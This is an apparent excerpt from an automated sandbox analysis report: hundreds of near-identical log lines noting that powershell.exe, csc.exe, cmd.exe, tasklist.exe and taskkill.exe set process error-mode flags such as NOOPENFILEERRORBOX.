          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework64\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\tasklist.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskkill.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\taskkill.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\cmd.exeProcess information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
          Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
